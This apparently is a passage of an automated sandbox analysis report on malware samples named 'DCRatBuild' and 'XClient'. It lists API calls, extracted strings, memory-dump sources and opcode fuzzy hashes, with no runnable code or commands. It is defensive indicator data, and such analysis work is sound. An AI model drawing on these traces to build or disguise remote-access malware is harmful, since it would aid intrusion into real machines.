                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Shell.Explorer$about:blank
                                  • API String ID: 0-874089819
                                  • Opcode ID: a34d211ab9525d88f4b28975a97b8dfad6268ebbf2c5008d0845da2fdb7772f3
                                  • Instruction ID: acf93ca2acacdb09ea61c7adafe76c1dff8f2b7a752ce52ed210c9cc98b0a570
                                  • Opcode Fuzzy Hash: a34d211ab9525d88f4b28975a97b8dfad6268ebbf2c5008d0845da2fdb7772f3
                                  • Instruction Fuzzy Hash: 9321E4712143949FCB18AF29C895A2A77A8FF86710B04C06DF849CF282DFB0EC00CB61
                                  APIs
                                    • Part of subcall function 008DEB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 008DEB92
                                    • Part of subcall function 008DEB73: GetProcAddress.KERNEL32(009181C0,CryptUnprotectMemory), ref: 008DEBA2
                                  • GetCurrentProcessId.KERNEL32(?,?,?,008DEBEC), ref: 008DEC84
                                  Strings
                                  • CryptUnprotectMemory failed, xrefs: 008DEC7C
                                  • CryptProtectMemory failed, xrefs: 008DEC3B
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AddressProc$CurrentProcess
                                  • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                  • API String ID: 2190909847-396321323
                                  • Opcode ID: beeb2cd183f20a491eee105a22fd7194cdac08cc247d21d3380d695e63713d61
                                  • Instruction ID: 71d4e6c5beeafb764e7b37014f281df943c7daac98c89bb6bb625eb8614c8b71
                                  • Opcode Fuzzy Hash: beeb2cd183f20a491eee105a22fd7194cdac08cc247d21d3380d695e63713d61
                                  • Instruction Fuzzy Hash: AF113A32A38218AFDB256B25DC466AE3758FF44724B048217FC15EF381CB756D4197D1
                                  APIs
                                  • CreateThread.KERNEL32(00000000,00010000,008E09D0,?,00000000,00000000), ref: 008E08AD
                                  • SetThreadPriority.KERNEL32(?,00000000), ref: 008E08F4
                                    • Part of subcall function 008D6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008D6EAF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: Thread$CreatePriority__vswprintf_c_l
                                  • String ID: CreateThread failed
                                  • API String ID: 2655393344-3849766595
                                  • Opcode ID: 90c8bd4283a7117b0daf76e5759f1d4a3be89a9f999a46d4927d80da79d243cc
                                  • Instruction ID: a0e078bb2f997b3274f2a076d29e8bd7b355d7a0a56e8dfdbf07100cd004c7ac
                                  • Opcode Fuzzy Hash: 90c8bd4283a7117b0daf76e5759f1d4a3be89a9f999a46d4927d80da79d243cc
                                  • Instruction Fuzzy Hash: 1D01FEB13443096FD6306F65EC42FA67398FB85715F20053EF646D2281CEF168C19A64
                                  APIs
                                    • Part of subcall function 008DDA98: _swprintf.LIBCMT ref: 008DDABE
                                    • Part of subcall function 008DDA98: _strlen.LIBCMT ref: 008DDADF
                                    • Part of subcall function 008DDA98: SetDlgItemTextW.USER32(?,0090E154,?), ref: 008DDB3F
                                    • Part of subcall function 008DDA98: GetWindowRect.USER32(?,?), ref: 008DDB79
                                    • Part of subcall function 008DDA98: GetClientRect.USER32(?,?), ref: 008DDB85
                                  • GetDlgItem.USER32(00000000,00003021), ref: 008D134F
                                  • SetWindowTextW.USER32(00000000,009035B4), ref: 008D1365
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                  • String ID: 0
                                  • API String ID: 2622349952-4108050209
                                  • Opcode ID: 1f3feaa888bdcf1b60fe17452622d90f5c5bf5af058eb5c90f7a919850b42c04
                                  • Instruction ID: 231720df659df91b569d6dfc09105ae7674eea1bb38da9f51df73fe1c8c87b80
                                  • Opcode Fuzzy Hash: 1f3feaa888bdcf1b60fe17452622d90f5c5bf5af058eb5c90f7a919850b42c04
                                  • Instruction Fuzzy Hash: 6AF08C3010838CBADF290F618D0DBE93B98FF50309F088216FD4994BA1C779C995EA10
                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,000000FF,008E0A78,?), ref: 008E0854
                                  • GetLastError.KERNEL32(?), ref: 008E0860
                                    • Part of subcall function 008D6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008D6EAF
                                  Strings
                                  • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 008E0869
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                  • API String ID: 1091760877-2248577382
                                  • Opcode ID: 218ca59c4f4c4428276e5c6066f8df2a697e18eb83895083b92fb4acaa8e96fb
                                  • Instruction ID: ade9c3b0cf7f10dcecaa5cb363a348040a3e3a7e68151bc7edfc06b1e0a5044f
                                  • Opcode Fuzzy Hash: 218ca59c4f4c4428276e5c6066f8df2a697e18eb83895083b92fb4acaa8e96fb
                                  • Instruction Fuzzy Hash: 51D02B31A0C0307AC6102328AC0ADAF3B18EF82330F604716F238D52F0DB21099151D2
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,?,008DD32F,?), ref: 008DDA53
                                  • FindResourceW.KERNEL32(00000000,RTL,00000005,?,008DD32F,?), ref: 008DDA61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: FindHandleModuleResource
                                  • String ID: RTL
                                  • API String ID: 3537982541-834975271
                                  • Opcode ID: fd43563744b38c542a71ff6dba1fc75a7388a1975092af808e362097fd66e297
                                  • Instruction ID: 33aef95128ee09e64223ce7ad90fd94169f0920f17e659bf1b6a2e5ddeabc391
                                  • Opcode Fuzzy Hash: fd43563744b38c542a71ff6dba1fc75a7388a1975092af808e362097fd66e297
                                  • Instruction Fuzzy Hash: EEC0123229B750BAD73017216C0DB432A5C6B10B11F05454DB181DA1D0D5E5C9449650
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: SAP_^
                                  • API String ID: 0-3471593181
                                  • Opcode ID: f9d424f599522f1f98acd38728bc6e5dde4869b6c1ee67d129358089e508cec1
                                  • Instruction ID: 7f5f7af81a4749242364211840d3d09148aa1d6ea3502bd0d96079f3f3949bfd
                                  • Opcode Fuzzy Hash: f9d424f599522f1f98acd38728bc6e5dde4869b6c1ee67d129358089e508cec1
                                  • Instruction Fuzzy Hash: 1C22D621B19A4D1BE7A8FB788479ABD77D1EF98300F4505BDE04DC33E6DE28A9418781
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c20d34d4e8a4b64d2b078747ecb60af72f7f88aae4b6ac176a763636d5507b3b
                                  • Instruction ID: 2b3b69d618bffc9d78a24a6b49effc2389738c5878850fdbf0a47b4e39847110
                                  • Opcode Fuzzy Hash: c20d34d4e8a4b64d2b078747ecb60af72f7f88aae4b6ac176a763636d5507b3b
                                  • Instruction Fuzzy Hash: 37F19130A09A8D8FEBA8EF28D8557F937D1FB64310F14426EE84DC72A5DB34D9458B81
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 086a66a3ec0ce7e8e5f9421b540f914416bec21fb1518035ede92051e95858d3
                                  • Instruction ID: ef6de585c8f03733248ca4956f173f645a7678bfa76897a210b7c1ab3366791b
                                  • Opcode Fuzzy Hash: 086a66a3ec0ce7e8e5f9421b540f914416bec21fb1518035ede92051e95858d3
                                  • Instruction Fuzzy Hash: 6EE1B330A09A8E9FEBA8EF28C8557F97BD1EB54310F14426ED84DC72A5DF7499408B81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: SAP_^
                                  • API String ID: 0-3471593181
                                  • Opcode ID: 19d62dc1a3af591d36faa149cb1583c37248a3e13095c6d458f0c585b1ec10c2
                                  • Instruction ID: b326d22da561924ac0652f234e6cca50935ca1fe48776ebbe06790b473ed1893
                                  • Opcode Fuzzy Hash: 19d62dc1a3af591d36faa149cb1583c37248a3e13095c6d458f0c585b1ec10c2
                                  • Instruction Fuzzy Hash: 3FA1C421B1DA491BE7A8FB6C4875679B7D2EF98300F4546BDE04DC33E6DE28A9414381
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: u>]I
                                  • API String ID: 0-1397071109
                                  • Opcode ID: 64e1d5c7302785913749a0e925c79bb4c886ad3d02f66a7a4dbdaf67232b236c
                                  • Instruction ID: 438ac725634e1f10505f4f6fa6ee44ad35289ad796fb7a88f36ae0adae54ad4c
                                  • Opcode Fuzzy Hash: 64e1d5c7302785913749a0e925c79bb4c886ad3d02f66a7a4dbdaf67232b236c
                                  • Instruction Fuzzy Hash: D8510522E0E7D62FD712EB7854B55E87FA0EF5221870A41FFC099CB1E7DE04690A8395
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: d
                                  • API String ID: 0-2564639436
                                  • Opcode ID: da79075725bde71c148ad1908c4b26a0e6d865866c23be2fc11315142571bc49
                                  • Instruction ID: 75374fc620d4732380a72dd100c3b7f8c1444fbab427aba6634d2a4becd56e8c
                                  • Opcode Fuzzy Hash: da79075725bde71c148ad1908c4b26a0e6d865866c23be2fc11315142571bc49
                                  • Instruction Fuzzy Hash: 50212731D0935A4FDB10AFE4C8556FABBF0EF46314F0602BFD899D32A1CB28564587A1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: SAP_^
                                  • API String ID: 0-3471593181
                                  • Opcode ID: 673cafede31c5ee02931b7b59f60c28a3a51ff01157bbba51f9348a81a97e293
                                  • Instruction ID: d8e353f3c445eea16b4004e46a227b8d502e1a47dc22c06fc8947e98e37176f0
                                  • Opcode Fuzzy Hash: 673cafede31c5ee02931b7b59f60c28a3a51ff01157bbba51f9348a81a97e293
                                  • Instruction Fuzzy Hash: 2211E421F0F78A1BF326B77948314B83BA16F82650F4A42BDD059C66F3ED1C69068392
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: d
                                  • API String ID: 0-2564639436
                                  • Opcode ID: 027759c7383bdf1bc0fb4299e9b701c028114c75bac7bd7d2ce1478cb7776150
                                  • Instruction ID: 59df53df3a6d180cf15edc493e2a3f7ab9b9345ded41f1399641660b1f2dcc7b
                                  • Opcode Fuzzy Hash: 027759c7383bdf1bc0fb4299e9b701c028114c75bac7bd7d2ce1478cb7776150
                                  • Instruction Fuzzy Hash: B111A531E0961E5AEB24BFE884156FEB6A0EF44305F02023ED95DE33B0DF3967408691
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: SAP_^
                                  • API String ID: 0-3471593181
                                  • Opcode ID: 5a32a212680affca1cf715ceef10aa0369ff612d10b5f4323b0e92fcb31ee458
                                  • Instruction ID: 6f96468955162bee28c848b402d914d898dda40f5f42baa0afc71c035a062694
                                  • Opcode Fuzzy Hash: 5a32a212680affca1cf715ceef10aa0369ff612d10b5f4323b0e92fcb31ee458
                                  • Instruction Fuzzy Hash: FEF0D630E0D60AABE335FB59846167833B2AB85310F51477CE01DC27F6DF28B9418681
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f727acf5301a83660fcb2082d4002dd7a4bd96b9e1673e3e9e3b976c1ca1f79b
                                  • Instruction ID: da10d72fe709f04b0d43f41cfffcbb460e1d094f2ecc34566e7a8eac4e9ee511
                                  • Opcode Fuzzy Hash: f727acf5301a83660fcb2082d4002dd7a4bd96b9e1673e3e9e3b976c1ca1f79b
                                  • Instruction Fuzzy Hash: D7B1A330609B8D4FEBA9EF28D8557F93BD1EF55310F04426EE84DC72A6CA3499458B82
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d7de82983749ed35d9afdb4906aad9bbf2265b358684f4bf960f2d2d111e09c0
                                  • Instruction ID: 028bf4e6090b24c6a82f03943ded8330266c3a94aec9b73777948b5d73a3f2b2
                                  • Opcode Fuzzy Hash: d7de82983749ed35d9afdb4906aad9bbf2265b358684f4bf960f2d2d111e09c0
                                  • Instruction Fuzzy Hash: 1391C624B1894D5BE788B7AC947AB7DB2D6EFD8300F5141B9E00DC33EACD68B8414352
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 446da90b94a420a69d8378629bf569310fb2cc8eded65fdd7c45bf4e2b03c168
                                  • Instruction ID: 5c1842efa99b39884a2da69e375d8986f7814d5e0f7cbccd59ade9de19ce1573
                                  • Opcode Fuzzy Hash: 446da90b94a420a69d8378629bf569310fb2cc8eded65fdd7c45bf4e2b03c168
                                  • Instruction Fuzzy Hash: 4D812771F0EA4E1FE768FB6888656B577E1EF44310F4506BED00DC72E6DE28A9468381
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1ec8834f85712702e517f34c4685cb05959f804a42c3feece4db89db1befd3bb
                                  • Instruction ID: 19c79be00ed6a464aa4b7d3ba1888cd9661f35d16d590064aec0e48d0998ca51
                                  • Opcode Fuzzy Hash: 1ec8834f85712702e517f34c4685cb05959f804a42c3feece4db89db1befd3bb
                                  • Instruction Fuzzy Hash: 1F810361B09A4D5BE7A8EB6C54786BD72D2EF98310F15067DE05EC33E6DE286D028780
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c7c5931085aa3e6f1c969ee80e6a0bf372159a6d919cad65c13c2389b23eb797
                                  • Instruction ID: 9a33f123a4cd13839352e01d6a4ef2466f66d9a0c0ce241fb4ca611d4b14df46
                                  • Opcode Fuzzy Hash: c7c5931085aa3e6f1c969ee80e6a0bf372159a6d919cad65c13c2389b23eb797
                                  • Instruction Fuzzy Hash: B5810731B09A4D5FDBA5EB789869AF977E1EF49310F05027EE00DD32F2CE28A9418741
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff765fc33eb325f70ca344878a19592bd2ee812c137234b7d2cec9faa55140c1
                                  • Instruction ID: 6be741b628a8d962823aa9384f3f0bc58541d9436ddb89f7793ceb5fb40b33f3
                                  • Opcode Fuzzy Hash: ff765fc33eb325f70ca344878a19592bd2ee812c137234b7d2cec9faa55140c1
                                  • Instruction Fuzzy Hash: E9712661F09A4D5FE7A8EB6844746B977D1EF98310F5506BDE04AC33E6DE286D028380
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2b7662793b903ae437f5857bbb96fe1b7beb61bb6dcbf98cda3b28bbc8edb96d
                                  • Instruction ID: ee69ac5934ae5032aa18871110215cf0f052ad1ab0eac8c66b6f22df317bbf3c
                                  • Opcode Fuzzy Hash: 2b7662793b903ae437f5857bbb96fe1b7beb61bb6dcbf98cda3b28bbc8edb96d
                                  • Instruction Fuzzy Hash: DB61C431B1990D5FDBA8EB68C4A9ABD77E2EF99310F05017DE01ED32E6CE24AD418741
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 94902cee586dde9ef2a6743277190588dca0de808b9a7d83f7f725796bf26e66
                                  • Instruction ID: ec3e181217af0cb4fe32c6983ede4732ee4f5f9b3848eca3e43b4d81a90b6a83
                                  • Opcode Fuzzy Hash: 94902cee586dde9ef2a6743277190588dca0de808b9a7d83f7f725796bf26e66
                                  • Instruction Fuzzy Hash: A4516130A18A4C4FDB58EF58D855BFDBBF1FF99310F1042AAD44DD3296DA34A9428B81
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7b310034701f0c3182ddf3d40517065f4388f05f8335d66c4c45274bfac44e63
                                  • Instruction ID: df3e8b65949c795bf3fdd155462eb6f88b40ee15a374da15124e8e4c0552d6d4
                                  • Opcode Fuzzy Hash: 7b310034701f0c3182ddf3d40517065f4388f05f8335d66c4c45274bfac44e63
                                  • Instruction Fuzzy Hash: 82510471A0D64D9FD758EFA8C865AB87BF0EF95311F0442BED049C32E2DB29A446C741
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 26a01d11b9e6620981c65bb44a6f68e8b405285764d7f1cd4646ce4fd3847047
                                  • Instruction ID: 20c1ad0ef4573f7152cd0164b47b1ad081806aeac734b581e22a8266ffc2baba
                                  • Opcode Fuzzy Hash: 26a01d11b9e6620981c65bb44a6f68e8b405285764d7f1cd4646ce4fd3847047
                                  • Instruction Fuzzy Hash: 98517430A08B5C8FDB58EB58D855BE9BBF1FF59310F0082AAD44DD3256DF34A9858B81
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 51173c9089f370a37e02163cb7640e69fd310c92dc2fc7f227c930aca6e21154
                                  • Instruction ID: 40535fbddfed882c796f7fab1abb3bb11e1a94b9f71626278706a4bbe8fdf11a
                                  • Opcode Fuzzy Hash: 51173c9089f370a37e02163cb7640e69fd310c92dc2fc7f227c930aca6e21154
                                  • Instruction Fuzzy Hash: 83513930E0D78A5FE756EBB448216A57BA0EF16320F1902FED099C72F7CD686842C751
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0136d473d2b681410e9aa07f89341b5aa65f0787b479abb906ce669acef7e4e1
                                  • Instruction ID: 17b09ddb5ff0af4498363d0779210543f8e0dc23acb3c7fd7c74a2431b9df6aa
                                  • Opcode Fuzzy Hash: 0136d473d2b681410e9aa07f89341b5aa65f0787b479abb906ce669acef7e4e1
                                  • Instruction Fuzzy Hash: CD512320B1DAC90FD79AAB7848796757BD1DF9A219B0805FEE08DC72E7DD185802C342
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.4200581925.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7ffd9b7c0000_XClient.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dbfb017120db4ee69488ad0c0572f5b6f5e2d301a293f57a5147d7eb482b0dfe
                                  • Instruction ID: 1404ce5ab05f936217ababc14c05e9297e23afb0a3957158195c1bcccbf9a4b4
